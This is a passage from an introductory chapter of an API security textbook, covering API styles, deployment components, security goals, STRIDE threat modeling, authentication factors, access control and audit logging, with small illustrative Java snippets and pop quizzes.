greenhouse and garden but not into your house and whisky collection.
When you return from your trip, you review the footage from your comprehensive
(some might say over-the-top) camera surveillance system. You cross Bob off the
Christmas card list and make a mental note to ask someone else to look after the
plants next time.
The next time you see Bob you confront him about the party. He tries to deny it at
first, but when you point out the cameras, he admits everything. He buys you a lovely
new Venus flytrap to say sorry. The video cameras show the advantage of having good
audit logs so that you can find out who did what when things go wrong, and if neces-
sary, prove who was responsible in a way they cannot easily deny.
DEFINITION
An audit log records details of significant actions taken on a sys-
tem, so that you can later work out who did what and when. Audit logs are
crucial evidence when investigating potential security breaches.
You can hopefully now see a few of the mechanisms that are involved in securing an
API, but before we dive into the details let’s review what an API is and what it means
for it to be secure.
1.2 What is an API?
Traditionally, an API was provided by a software library that could be linked into an
application either statically or dynamically at runtime, allowing reuse of procedures
and functions for specific problems, such as OpenGL for 3D graphics, or libraries for
TCP/IP networking. Such APIs are still common, but a growing number of APIs are
now made available over the internet as RESTful web services.
Broadly speaking, an API is a boundary between one part of a software system and
another. It defines a set of operations that one component provides for other parts of
the system (or other systems) to use. For example, a photography archive might pro-
vide an API to list albums of photos, to view individual photos, add comments, and so
on. An online image gallery could then use that API to display interesting photos,
while a word processor application could use the same API to allow embedding
images into a document. As shown in figure 1.1, an API handles requests from one or
more clients on behalf of users. A client may be a web or mobile application with a
user interface (UI), or it may be another API with no explicit UI. The API itself may
talk to other APIs to get its work done.
[Figure 1.1 An API handles requests from clients on behalf of users. Clients may be web browsers, mobile apps, devices in the Internet of Things, or other APIs. The API services requests according to its internal logic and then at some point returns a response to the client. The implementation of the API may require talking to other "backend" APIs, provided by databases or processing systems.]
A UI also provides a boundary to a software system and restricts the operations that
can be performed. What distinguishes an API from a UI is that an API is explicitly
designed to be easy to interact with by other software, while a UI is designed to be easy
for a user to interact with directly. Although a UI might present information in a rich
form to make the information pleasing to read and easy to interact with, an API typi-
cally will present instead a highly regular and stripped-back view of the raw data in a
form that is easy for a program to parse and manipulate.
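To make this concrete, here is a minimal sketch of a client consuming such an API using Java's built-in HTTP client (Java 11+). The URL and the response format shown in the comment are hypothetical stand-ins for the photography archive described above:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class PhotoApiClient {
    public static void main(String[] args) throws Exception {
        HttpClient client = HttpClient.newHttpClient();
        // Request a machine-readable list of albums from the (hypothetical) API
        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create("https://photos.example.com/albums"))
                .header("Accept", "application/json")
                .GET()
                .build();
        HttpResponse<String> response =
                client.send(request, HttpResponse.BodyHandlers.ofString());
        // The API returns plain structured data rather than a rich UI, e.g.
        // [{"id":1,"title":"Holiday"},{"id":2,"title":"Cats"}]
        System.out.println(response.body());
    }
}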
1.2.1 API styles
There are several popular approaches to exposing remote APIs:
Remote Procedure Call (RPC) APIs expose a set of procedures or functions that
can be called by clients over a network connection. The RPC style is designed to
resemble normal procedure calls as if the API were provided locally. RPC APIs
often use compact binary formats for messages and are very efficient, but usu-
ally require the client to install specific libraries (known as stubs) that work with
a single API. The gRPC framework from Google (https://grpc.io) is an example
of a modern RPC approach. The older SOAP (Simple Object Access Protocol)
framework, which uses XML for messages, is still widely deployed.
A variant of the RPC style known as Remote Method Invocation (RMI) uses object-
oriented techniques to allow clients to call methods on remote objects as if
they were local. RMI approaches used to be very popular, with technologies
such as CORBA and Enterprise Java Beans (EJBs) often used for building large
enterprise systems. The complexity of these frameworks has led to a decline in
their use.
The REST (REpresentational State Transfer) style was developed by Roy Fielding to
describe the principles that led to the success of HTTP and the web and was later
adapted as a set of principles for API design. In contrast to RPC, RESTful APIs
emphasize standard message formats and a small number of generic operations
to reduce the coupling between a client and a specific API. Use of hyperlinks to
navigate the API reduce the risk of clients breaking as the API evolves over time.
Some APIs are mostly concerned with efficient querying and filtering of large
data sets, such as SQL databases or the GraphQL framework from Facebook
(https://graphql.org). In these cases, the API often only provides a few opera-
tions and a complex query language allows the client significant control over
what data is returned.
Different API styles are suitable for different environments. For example, an organiza-
tion that has adopted a microservices architecture might opt for an efficient RPC frame-
work to reduce the overhead of API calls. This is appropriate because the organization
controls all of the clients and servers in this environment and can manage distributing
new stub libraries when they are required. On the other hand, a widely used public
API might be better suited to the REST style using a widely used format such as JSON
to maximize interoperability with different types of clients.
DEFINITION
In a microservices architecture, an application is deployed as a collec-
tion of loosely coupled services rather than a single large application, or
monolith. Each microservice exposes an API that other services talk to. Secur-
ing microservice APIs is covered in detail in part 4 of this book.
This book will focus on APIs exposed over HTTP using a loosely RESTful approach, as
this is the predominant style of API at the time of writing. That is, although the APIs
that are developed in this book will try to follow REST design principles, you will
sometimes deviate from those principles to demonstrate how to secure other styles of
API design. Much of the advice will apply to other styles too, and the general princi-
ples will even apply when designing a library.
1.3 API security in context
API security lies at the intersection of several security disciplines, as shown in figure 1.2.
The most important of these are the following three areas:
1 Information security (InfoSec) is concerned with the protection of information over its full life cycle from creation, storage, transmission, backup, and eventual destruction.
2 Network security deals with both the protection of data flowing over a network and prevention of unauthorized access to the network itself.
3 Application security (AppSec) ensures that software systems are designed and built to withstand attacks and misuse.
Each of these three topics has filled many books individually, so we will not cover each
of them in full depth. As figure 1.2 illustrates, you do not need to learn every aspect of
these topics to know how to build secure APIs. Instead, we will pick the most critical
areas from each and blend them to give you a thorough understanding of how they
apply to securing an API.
From information security you will learn how to:
Define your security goals and identify threats
Protect your APIs using access control techniques
Secure information using applied cryptography
DEFINITION
Cryptography is the science of protecting information so that two
or more people can communicate without their messages being read or tam-
pered with by anybody else. It can also be used to protect information written
to disk.
From network security you will learn:
The basic infrastructure used to protect an API on the internet, including fire-
walls, load-balancers, and reverse proxies, and roles they play in protecting your
API (see the next section)
Use of secure communication protocols such as HTTPS to protect data trans-
mitted to or from your API
DEFINITION
HTTPS is the name for HTTP running over a secure connection.
While normal HTTP requests and responses are visible to anybody watching
the network traffic, HTTPS messages are hidden and protected by Transport
Layer Security (TLS, also known as SSL). You will learn how to enable HTTPS
for an API in chapter 3.
[Figure 1.2 API security lies at the intersection of three security areas: information security, network security, and application security.]
Finally, from application security you will learn:
Secure coding techniques
Common software security vulnerabilities
How to store and manage system and user credentials used to access your APIs
1.3.1 A typical API deployment
An API is implemented by application code running on a server; either an application
server such as Java Enterprise Edition (Java EE), or a standalone server. It is very rare to
directly expose such a server to the internet, or even to an internal intranet. Instead,
requests to the API will typically pass through one or more additional network services
before they reach your API servers, as shown in figure 1.3. Each request will pass
through one or more firewalls, which inspect network traffic at a relatively low level
and ensure that any unexpected traffic is blocked. For example, if your APIs are serv-
ing requests on port 80 (for HTTP) and 443 (for HTTPS), then the firewall would
be configured to block any requests for any other ports. A load balancer will then
route traffic to appropriate services and ensure that one server is not overloaded
with lots of requests while others sit idle. Finally, a reverse proxy (or gateway) is typi-
cally placed in front of the application servers to perform computationally expensive
operations like handling TLS encryption (known as SSL termination) and validating
credentials on requests.
[Figure 1.3 Requests to your API servers will typically pass through several other services first. A firewall works at the TCP/IP level and only allows traffic in or out of the network that matches expected flows. A load balancer routes requests to appropriate internal services based on the request and on its knowledge of how much work each server is currently doing. A reverse proxy or API gateway can take care of expensive tasks on behalf of the API server, such as terminating HTTPS connections or validating authentication credentials.]
DEFINITION
SSL termination (or SSL offloading; in this context, the newer term TLS is rarely used) occurs when a TLS connec-
tion from a client is handled by a load balancer or reverse proxy in front of
the destination API server. A separate connection from the proxy to the back-
end server is then made, which may either be unencrypted (plain HTTP) or
encrypted as a separate TLS connection (known as SSL re-encryption).
Beyond these basic elements, you may encounter several more specialist services:
An API gateway is a specialized reverse proxy that can make different APIs appear
as if they are a single API. They are often used within a microservices architec-
ture to simplify the API presented to clients. API gateways can often also take
care of some of the aspects of API security discussed in this book, such as authen-
tication or rate-limiting.
A web application firewall (WAF) inspects traffic at a higher level than a tradi-
tional firewall and can detect and block many common attacks against HTTP
web services.
An intrusion detection system (IDS) or intrusion prevention system (IPS) monitors
traffic within your internal networks. When it detects suspicious patterns of
activity it can either raise an alert or actively attempt to block the suspicious
traffic.
In practice, there is often some overlap between these services. For example, many
load balancers are also capable of performing tasks of a reverse proxy, such as termi-
nating TLS connections, while many reverse proxies can also function as an API
gateway. Certain more specialized services can even handle many of the security
mechanisms that you will learn in this book, and it is becoming common to let a gate-
way or reverse proxy handle at least some of these tasks. There are limits to what these
components can do, and poor security practices in your APIs can undermine even the
most sophisticated gateway. A poorly configured gateway can also introduce new risks
to your network. Understanding the basic security mechanisms used by these products
will help you assess whether a product is suitable for your application, and exactly
what its strengths and limitations are.

Pop quiz
1 Which of the following topics are directly relevant to API security? (Select all that apply.)
a Job security
b National security
c Network security
d Financial security
e Application security
f Information security
2 An API gateway is a specialized version of which one of the following components?
a Client
b Database
c Load balancer
d Reverse proxy
e Application server
The answers are at the end of the chapter.
1.4 Elements of API security
An API by its very nature defines a set of operations that a caller is permitted to use. If
you don’t want a user to perform some operation, then simply exclude it from the
API. So why do we need to care about API security at all?
First, the same API may be accessible to users with distinct levels of authority;
for example, with some operations allowed for only administrators or other
users with a special role. The API may also be exposed to users (and bots) on
the internet who shouldn’t have any access at all. Without appropriate access
controls, any user can perform any action, which is likely to be undesirable.
These are factors related to the environment in which the API must operate.
Second, while each individual operation in an API may be secure on its own, combinations of operations might not be. For example, a banking API might offer separate withdrawal and deposit operations, which individually check that limits are not exceeded. But the deposit operation has no way to know if the money being deposited has come from a real account. A better API would offer a transfer operation that moves money from one account to another in a single operation, guaranteeing that the same amount of money always exists (a sketch of such a transfer appears below). The security of an API needs to be considered as a whole, and not as individual operations.
Last, there may be security vulnerabilities due to the implementation of the
API. For example, failing to check the size of inputs to your API may allow an
attacker to bring down your server by sending a very large input that consumes
all available memory; a type of denial of service (DoS) attack.
DEFINITION
A denial of service (DoS) attack occurs when an attacker can pre-
vent legitimate users from accessing a service. This is often done by flooding a
service with network traffic, preventing it from servicing legitimate requests,
but can also be achieved by disconnecting network connections or exploiting
bugs to crash the server.
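To illustrate the transfer operation mentioned in the list above, here is a minimal sketch using a JDBC transaction. The accounts table and its columns are hypothetical; the point is that the debit and the credit either both happen or neither does:

import java.math.BigDecimal;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;

public class Transfers {
    // Moves money atomically: the debit and credit either both commit or
    // both roll back, so money is never created or destroyed.
    static void transfer(Connection con, String from, String to,
                         BigDecimal amount) throws SQLException {
        con.setAutoCommit(false);
        try (PreparedStatement debit = con.prepareStatement(
                 "UPDATE accounts SET balance = balance - ?" +
                 " WHERE id = ? AND balance >= ?");
             PreparedStatement credit = con.prepareStatement(
                 "UPDATE accounts SET balance = balance + ? WHERE id = ?")) {
            debit.setBigDecimal(1, amount);
            debit.setString(2, from);
            debit.setBigDecimal(3, amount);
            if (debit.executeUpdate() != 1) {      // insufficient funds
                con.rollback();
                throw new SQLException("debit failed");
            }
            credit.setBigDecimal(1, amount);
            credit.setString(2, to);
            credit.executeUpdate();
            con.commit();                          // both updates or neither
        } catch (SQLException e) {
            con.rollback();
            throw e;
        }
    }
}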
Some API designs are more amenable to secure implementation than others, and
there are tools and techniques that can help to ensure a secure implementation. It is
much easier (and cheaper) to think about secure development before you begin cod-
ing rather than waiting until security defects are identified later in development or in
production. Retrospectively altering a design and development life cycle to account
for security is possible, but rarely easy. This book will teach you practical techniques
for securing APIs, but if you want a more thorough grounding in how to design-in
security from the start, then I recommend the book Secure by Design by Dan Bergh
Johnsson, Daniel Deogun, and Daniel Sawano (Manning, 2019).
It is important to remember that there is no such thing as a perfectly secure sys-
tem, and there is not even a single definition of “security.” For a healthcare provider,
being able to discover whether your friends have accounts on a system would be con-
sidered a major security flaw and a privacy violation. However, for a social network, the
same capability is an essential feature. Security therefore depends on the context.
There are many aspects that should be considered when designing a secure API,
including the following:
The assets that are to be protected, including data, resources, and physical devices
Which security goals are important, such as confidentiality of account names
The mechanisms that are available to achieve those goals
The environment in which the API is to operate, and the threats that exist in that
environment
1.4.1 Assets
For most APIs, the assets will consist of information, such as customer names and
addresses, credit card information, and the contents of databases. If you store infor-
mation about individuals, particularly if it may be sensitive such as sexual orientation
or political affiliations, then this information should also be considered an asset to
be protected.
There are also physical assets to consider, such as the physical servers or devices
that your API is running on. For servers running in a datacenter, there are relatively
few risks of an intruder stealing or damaging the hardware itself, due to physical pro-
tections (fences, walls, locks, surveillance cameras, and so on) and the vetting and
monitoring of staff that work in those environments. But an attacker may be able to
gain control of the resources that the hardware provides through weaknesses in the
operating system or software running on it. If they can install their own software, they
may be able to use your hardware to perform their own actions and stop your legiti-
mate software from functioning correctly.
In short, anything connected with your system that has value to somebody should
be considered an asset. Put another way, if anybody would suffer real or perceived
harm if some part of the system were compromised, that part should be considered an
asset to be protected. That harm may be direct, such as loss of money, or it may be
more abstract, such as loss of reputation. For example, if you do not properly protect
your users’ passwords and they are stolen by an attacker, the users may suffer direct
harm due to the compromise of their individual accounts, but your organization
would also suffer reputational damage if it became known that you hadn’t followed
basic security precautions.
1.4.2 Security goals
Security goals are used to define what security actually means for the protection of your
assets. There is no single definition of security, and some definitions can even be con-
tradictory! You can break down the notion of security in terms of the goals that should
be achieved or preserved by the correct operation of the system. There are several
standard security goals that apply to almost all systems. The most famous of these are
the so-called “CIA Triad”:
Confidentiality—Ensuring information can only be read by its intended audience
Integrity—Preventing unauthorized creation, modification, or destruction of
information
Availability—Ensuring that the legitimate users of an API can access it when
they need to and are not prevented from doing so.
Although these three properties are almost always important, there are other security
goals that may be just as important in different contexts, such as accountability (who
did what) or non-repudiation (not being able to deny having performed an action). We
will discuss security goals in depth as you develop aspects of a sample API.
Security goals can be viewed as non-functional requirements (NFRs) and considered
alongside other NFRs such as performance or reliability goals. In common with other
NFRs, it can be difficult to define exactly when a security goal has been satisfied. It is
hard to prove that a security goal is never violated because this involves proving a nega-
tive, but it’s also difficult to quantify what “good enough” confidentiality is, for example.
One approach to making security goals precise is used in cryptography. Here,
security goals are considered as a kind of game between an attacker and the system,
with the attacker given various powers. A standard game for confidentiality is known
as indistinguishability. In this game, shown in figure 1.4, the attacker gives the system
two equal-length messages, A and B, of their choosing and then the system gives
back the encryption of either one or the other. The attacker wins the game if they
can determine which of A or B was given back to them. The system is said to be
secure (for this security goal) if no realistic attacker has better than a 50:50 chance
of guessing correctly.
[Figure 1.4 The indistinguishability game used to define confidentiality in cryptography. The attacker is allowed to submit two equal-length messages, A and B. The system then picks one at random and encrypts it using the key. The system is secure if no "efficient" challenger can do much better than guesswork to know whether they received the encryption of message A or B.]
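The following toy simulation of the game, written against the standard Java crypto APIs using AES-GCM, may help make the setup concrete. It is an illustration of the game only, not a security proof:

import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;

public class IndGame {
    public static void main(String[] args) throws Exception {
        SecureRandom random = new SecureRandom();
        KeyGenerator keyGen = KeyGenerator.getInstance("AES");
        keyGen.init(128);
        SecretKey key = keyGen.generateKey();

        // The attacker submits two equal-length messages, A and B.
        byte[] a = "attack at dawn".getBytes(StandardCharsets.UTF_8);
        byte[] b = "attack at dusk".getBytes(StandardCharsets.UTF_8);

        // The system picks one at random and encrypts it with a fresh nonce.
        boolean choice = random.nextBoolean();
        byte[] nonce = new byte[12];
        random.nextBytes(nonce);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(128, nonce));
        byte[] ciphertext = cipher.doFinal(choice ? a : b);

        // All the attacker sees is the ciphertext; with a secure cipher they
        // can do no better than a 50:50 guess about which message it hides.
        System.out.println("Ciphertext length: " + ciphertext.length);
    }
}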
Not every scenario can be made as precise as those used in cryptography. An alterna-
tive is to refine more abstract security goals into specific requirements that are con-
crete enough to be testable. For example, an instant messaging API might have the
functional requirement that users are able to read their messages. To preserve confidentiality,
you may then add constraints that users are only able to read their own messages and
that a user must be logged in before they can read their messages. In this approach, secu-
rity goals become constraints on existing functional requirements. It then becomes
easier to think up test cases. For example:
Create two users and populate their accounts with dummy messages.
Check that the first user cannot read the messages of the second user.
Check that a user that has not logged in cannot read any messages.
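As a sketch of how such constraints might become automated tests, consider the following JUnit 5 outline. The MessageClient class and its exception types are hypothetical stand-ins for whatever client library your API provides:

import static org.junit.jupiter.api.Assertions.assertThrows;
import org.junit.jupiter.api.Test;

class ConfidentialityTest {
    @Test
    void userCannotReadAnotherUsersMessages() {
        // MessageClient and ForbiddenException are hypothetical helpers
        MessageClient alice = MessageClient.login("alice", "password1");
        assertThrows(ForbiddenException.class,
                () -> alice.readMessages("bob"));   // Alice must not see Bob's messages
    }

    @Test
    void anonymousUserCannotReadAnyMessages() {
        MessageClient anonymous = MessageClient.anonymous();
        assertThrows(UnauthorizedException.class,
                () -> anonymous.readMessages("alice"));
    }
}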
There is no single correct way to break down a security goal into specific require-
ments, and so the process is always one of iteration and refinement as the constraints
become clearer over time, as shown in figure 1.5. After identifying assets and defining
security goals, you break down those goals into testable constraints. Then as you
implement and test those constraints, you may identify new assets to be protected. For
example, after implementing your login system, you may give each user a unique tem-
porary session cookie. This session cookie is itself a new asset that should be pro-
tected. Session cookies are discussed in chapter 4.
[Figure 1.5 Defining security for your API consists of a four-step iterative process of identifying assets, defining the security goals that you need to preserve for those assets, and then breaking those down into testable implementation constraints. Implementation may then identify new assets or goals and so the process continues.]
This iterative process shows that security is not a one-off process that can be signed
off once and then forgotten about. Just as you wouldn’t test the performance of an
API only once, you should revisit security goals and assumptions regularly to make
sure they are still valid.
1.4.3 Environments and threat models
A good definition of API security must also consider the environment in which your
API is to operate and the potential threats that will exist in that environment. A
threat is simply any way that a security goal might be violated with respect to one or
more of your assets. In a perfect world, you would be able to design an API that
achieved its security goals against any threat. But the world is not perfect, and it is
rarely possible or economical to prevent all attacks. In some environments some
threats are just not worth worrying about. For example, an API for recording race
times for a local cycling club probably doesn’t need to worry about the attentions of
a nation-state intelligence agency, although it may want to prevent riders trying to
“improve” their own best times or alter those of other cyclists. By considering realis-
tic threats to your API you can decide where to concentrate your efforts and identify
gaps in your defenses.
DEFINITION
A threat is an event or set of circumstances that defeats the secu-
rity goals of your API. For example, an attacker stealing names and address
details from your customer database is a threat to confidentiality.
The set of threats that you consider relevant to your API is known as your threat model,
and the process of identifying them is known as threat modeling.
DEFINITION
Threat modeling is the process of systematically identifying threats
to a software system so that they can be recorded, tracked, and mitigated.
There is a famous quote attributed to Dwight D. Eisenhower:
Plans are worthless, but planning is everything.
It is often like that with threat modeling. It is less important exactly how you do threat
modeling or where you record the results. What matters is that you do it, because the
process of thinking about threats and weaknesses in your system will almost always
improve the security of the API.
There are many ways to do threat modeling, but the general process is as follows:
1 Draw a system diagram showing the main logical components of your API.
2 Identify trust boundaries between parts of the system. Everything within a trust boundary is controlled and managed by the same owner, such as a private datacenter or a set of processes running under a single operating system user.
3 Draw arrows to show how data flows between the various parts of the system.
4 Examine each component and data flow in the system and try to identify threats that might undermine your security goals in each case. Pay particular attention to flows that cross trust boundaries. (See the next section for how to do this.)
5 Record threats to ensure they are tracked and managed.
The diagram produced in steps one to three is known as a dataflow diagram, and an
example for a fictitious pizza ordering API is given in figure 1.6. The API is accessed
by a web application running in a web browser, and also by a native mobile phone app,
so these are both drawn as processes in their own trust boundaries. The API server
runs in the same datacenter as the database, but they run as different operating system
accounts so you can draw further trust boundaries to make this clear. Note that the
operating system account boundaries are nested inside the datacenter trust boundary.
For the database, I’ve drawn the database management system (DBMS) process sepa-
rately from the actual data files. It’s often useful to consider threats from users that
have direct access to files separately from threats that access the DBMS API because
these can be quite different.
[Figure 1.6 An example dataflow diagram, showing processes, data stores and the flow of data between them. Trust boundaries are marked with dashed lines. Internal processes are marked with rounded rectangles, while external entities use squared ends. Note that we include both the database management system (DBMS) process and its data files as separate entities.]
IDENTIFYING THREATS
If you pay attention to cybersecurity news stories, it can sometimes seem that there are
a bewildering variety of attacks that you need to defend against. While this is partly
true, many attacks fall into a few known categories. Several methodologies have been
developed to try to systematically identify threats to software systems, and we can use
these to identify the kinds of threats that might befall your API. The goal of threat
modeling is to identify these general threats, not to enumerate every possible attack.
One very popular methodology is known by the acronym STRIDE, which stands for:
Spoofing—Pretending to be somebody else
Tampering—Altering data, messages, or settings you’re not supposed to alter
Repudiation—Denying that you did something that you really did do
Information disclosure—Revealing information that should be kept private
Denial of service—Preventing others from accessing information and services
Elevation of privilege—Gaining access to functionality you’re not supposed to
have access to
Each initial in the STRIDE acronym represents a class of threat to your API. General
security mechanisms can effectively address each class of threat. For example, spoof-
ing threats, in which somebody pretends to be somebody else, can be addressed by
requiring all users to authenticate. Many common threats to API security can be elim-
inated entirely (or at least significantly mitigated) by the consistent application of a
few basic security mechanisms, as you’ll see in chapter 3 and the rest of this book.
LEARN ABOUT IT
You can learn more about STRIDE, and how to identify spe-
cific threats to your applications, through one of many good books about
threat modeling. I recommend Adam Shostack’s Threat Modeling: Designing for
Security (Wiley, 2014) as a good introduction to the subject.
1.5 Security mechanisms
Threats can be countered by applying security mechanisms that ensure that particular
security goals are met. In this section we will run through the most common security
mechanisms that you will generally find in every well-designed API:
Encryption ensures that data can’t be read by unauthorized parties, either when
it is being transmitted from the API to a client or at rest in a database or filesys-
tem. Modern encryption also ensures that data can’t be modified by an attacker.
Authentication is the process of ensuring that your users and clients are who they
say they are.
Access control (also known as authorization) is the process of ensuring that every
request made to your API is appropriately authorized.
Audit logging is used to ensure that all operations are recorded to allow account-
ability and proper monitoring of the API.
Rate-limiting is used to prevent any one user (or group of users) using all of the
resources and preventing access for legitimate users.
Figure 1.7 shows how these five processes are typically layered as a series of filters that
a request passes through before it is processed by the core logic of your API. As dis-
cussed in section 1.3.1, each of these five stages can sometimes be outsourced to an
external component such as an API gateway. In this book, you will build each of them
from scratch so that you can assess when an external component may be an appropri-
ate choice.
[Figure 1.7 When processing a request, a secure API will apply some standard steps. Requests and responses are encrypted using the HTTPS protocol. Rate-limiting is applied to prevent DoS attacks. Then users and clients are identified and authenticated, and a record is made of the access attempt in an access or audit log. Finally, checks are made to decide if this user should be able to perform this request. The outcome of the request should also be recorded in the audit log.]
Pop quiz
3 What do the initials CIA stand for when talking about security goals?
4 Which one of the following data flows should you pay the most attention to when threat modeling?
a Data flows within a web browser
b Data flows that cross trust boundaries
c Data flows between internal processes
d Data flows between external processes
e Data flows between a database and its data files
5 Imagine the following scenario: a rogue system administrator turns off audit logging before performing actions using an API. Which of the STRIDE threats are being abused in this case? Recall from section 1.1 that an audit log records who did what on the system.
The answers are at the end of the chapter.
1.5.1 Encryption
The other security mechanisms discussed in this section deal with protecting access to
data through the API itself. Encryption is used to protect data when it is outside your
API. There are two main cases in which data may be at risk:
Requests and responses to an API may be at risk as they travel over networks,
such as the internet. Encrypting data in transit is used to protect against these
threats.
Data may be at risk from people with access to the disk storage that is used for
persistence. Encrypting data at rest is used to protect against these threats.
TLS should be used to encrypt data in transit and is covered in chapter 3. Alternatives
to TLS for constrained devices are discussed in chapter 12. Encrypting data at rest is a
complex topic with many aspects to consider and is largely beyond the scope of this
book. Some considerations for database encryption are discussed in chapter 5.
1.5.2 Identification and authentication
Authentication is the process of verifying whether a user is who they say they are. We
are normally concerned with identifying who that user is, but in many cases the easiest
way to do that is to have the client tell us who they are and check that they are telling
the truth.
The driving test story at the beginning of the chapter illustrates the difference
between identification and authentication. When you saw your old friend Alice in the
park, you immediately knew who she was due to a shared history of previous interac-
tions. It would be downright bizarre (not to mention rude) if you asked old friends for
formal identification! On the other hand, when you attended your driving test it was
not surprising that the examiner asked to see your driving license. The examiner has
probably never met you before, and a driving test is a situation in which somebody
might reasonably lie about who they are, for example, to get a more experienced
driver to take the test for them. The driving license authenticates your claim that you
are a particular person, and the examiner trusts it because it is issued by an official
body and is difficult to fake.
Why do we need to identify the users of an API in the first place? You should always
ask this question of any security mechanism you are adding to your API, and the
answer should be in terms of one or more of the security goals that you are trying to
achieve. You may want to identify users for several reasons:
You want to record which users performed what actions to ensure accountability.
You may need to know who a user is to decide what they can do, to enforce con-
fidentiality and integrity goals.
You may want to only process authenticated requests to avoid anonymous DoS
attacks that compromise availability.
Because authentication is the most common method of identifying a user, it is com-
mon to talk of “authenticating a user” as a shorthand for identifying that user via
authentication. In reality, we never “authenticate” a user themselves but rather claims
about their identity such as their username. To authenticate a claim simply means to
determine if it is authentic, or genuine. This is usually achieved by asking the user to
present some kind of credentials that prove that the claims are correct (they provide
credence to the claims, which is where the word “credential” comes from), such as pro-
viding a password along with the username that only that user would know.
AUTHENTICATION FACTORS
There are many ways of authenticating a user, which can be divided into three broad
categories known as authentication factors:
Something you know, such as a secret password
Something you have, like a key or physical device
Something you are. This refers to biometric factors, such as your unique finger-
print or iris pattern.
Any individual factor of authentication may be compromised. People choose weak
passwords or write them down on notes attached to their computer screen, and they
mislay physical devices. Although biometric factors can be appealing, they often have
high error rates. For this reason, the most secure authentication systems require two
or more different factors. For example, your bank may require you to enter a pass-
word and then use a device with your bank card to generate a unique login code. This
is known as two-factor authentication (2FA) or multi-factor authentication (MFA).
DEFINITION
Two-factor authentication (2FA) or multi-factor authentication (MFA)
require a user to authenticate with two or more different factors so that a
compromise of any one factor is not enough to grant access to a system.
Note that an authentication factor is different from a credential. Authenticating with
two different passwords would still be considered a single factor, because they are both
based on something you know. On the other hand, authenticating with a password
and a time-based code generated by an app on your phone counts as 2FA because the
app on your phone is something you have. Without the app (and the secret key stored
inside it), you would not be able to generate the codes.
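As an illustration, here is a minimal sketch of verifying such a time-based code, in the style of TOTP (RFC 6238). A real deployment should use a well-vetted library; the parameter choices here (HMAC-SHA1, a 30-second time step, 6-digit codes) are merely common defaults:

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.ByteBuffer;

public class Totp {
    static int code(byte[] secret, long timeMillis) throws Exception {
        long counter = timeMillis / 1000 / 30;          // 30-second time step
        byte[] msg = ByteBuffer.allocate(8).putLong(counter).array();
        Mac hmac = Mac.getInstance("HmacSHA1");
        hmac.init(new SecretKeySpec(secret, "HmacSHA1"));
        byte[] hash = hmac.doFinal(msg);
        int offset = hash[hash.length - 1] & 0x0F;      // dynamic truncation
        int binary = ((hash[offset] & 0x7F) << 24)
                   | ((hash[offset + 1] & 0xFF) << 16)
                   | ((hash[offset + 2] & 0xFF) << 8)
                   |  (hash[offset + 3] & 0xFF);
        return binary % 1_000_000;                      // 6-digit code
    }

    static boolean verify(byte[] secret, int submitted) throws Exception {
        // The server shares the secret key with the app on the user's phone,
        // so both sides can compute the same code for the current time step.
        return code(secret, System.currentTimeMillis()) == submitted;
    }
}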
1.5.3 Access control and authorization
In order to preserve confidentiality and integrity of your assets, it is usually necessary
to control who has access to what and what actions they are allowed to perform. For
example, a messaging API may want to enforce that users are only allowed to read
their own messages and not those of anybody else, or that they can only send messages
to users in their friendship group.
NOTE
In this book I’ve used the terms authorization and access control inter-
changeably, because this is how they are often used in practice. Some authors
use the term access control to refer to an overall process including authentica-
tion, authorization, and audit logging, or AAA for short.
There are two primary approaches to access control that are used for APIs:
Identity-based access control first identifies the user and then determines what they
can do based on who they are. A user can try to access any resource but may be
denied access based on access control rules.
Capability-based access control uses special tokens or keys known as capabilities to
access an API. The capability itself says what operations the bearer can perform
rather than who the user is. A capability both names a resource and describes
the permissions on it, so a user is not able to access any resource that they do
not have a capability for.
Chapters 8 and 9 cover these two approaches to access control in detail.
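As a taste of what is to come, here is a minimal sketch of an identity-based check in Java. The permissions map is a hypothetical stand-in for access control rules that would normally live in a database:

import java.util.Map;
import java.util.Set;

public class AccessControl {
    // Maps a username to the operations they may perform.
    private final Map<String, Set<String>> permissions;

    public AccessControl(Map<String, Set<String>> permissions) {
        this.permissions = permissions;
    }

    public void enforce(String user, String operation) {
        // Deny by default: only explicitly granted operations are allowed.
        if (!permissions.getOrDefault(user, Set.of()).contains(operation)) {
            throw new SecurityException(user + " may not " + operation);
        }
    }
}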
It is even possible to design applications and their APIs to not need any access control
at all. A wiki is a type of website invented by Ward Cunningham, where users collabo-
rate to author articles about some topic or topics. The most famous wiki is Wikipedia,
the online encyclopedia that is one of the most viewed sites on the web. A wiki is
unusual in that it has no access controls at all. Any user can view and edit any page,
and even create new pages. Instead of access controls, a wiki provides extensive version
control capabilities so that malicious edits can be easily undone. An audit log of edits
provides accountability because it is easy to see who changed what and to revert those
changes if necessary. Social norms develop to discourage antisocial behavior. Even so,
large wikis like Wikipedia often have some explicit access control policies so that arti-
cles can be locked temporarily to prevent “edit wars” when two users disagree strongly
or in cases of persistent vandalism.

Capability-based security
The predominant approach to access control is identity-based, where who you are determines what you can do. When you run an application on your computer, it runs with the same permissions that you have. It can read and write all the files that you can read and write and perform all the same actions that you can do. In a capability-based system, permissions are based on unforgeable references known as capabilities (or keys). A user or an application can only read a file if they hold a capability that allows them to read that specific file. This is a bit like a physical key that you use in the real world; whoever holds the key can open the door that it unlocks. Just like a real key typically only unlocks a single door, capabilities are typically also restricted to just one object or file. A user may need many capabilities to get their work done, and capability systems provide mechanisms for managing all these capabilities in a user-friendly way. Capability-based access control is covered in detail in chapter 9.
1.5.4 Audit logging
An audit log is a record of every operation performed using your API. The purpose of
an audit log is to ensure accountability. It can be used after a security breach as part of
a forensic investigation to find out what went wrong, but also analyzed in real-time by
log analysis tools to identity attacks in progress and other suspicious behavior. A good
audit log can be used to answer the following kinds of questions:
Who performed the action and what client did they use?
When was the request received?
What kind of request was it, such as a read or modify operation?
What resource was being accessed?
Was the request successful? If not, why?
What other requests did they make around the same time?
It’s essential that audit logs are protected from tampering, and they often contain per-
sonally identifiable information that should be kept confidential. You’ll learn more about
audit logging in chapter 3.
DEFINITION
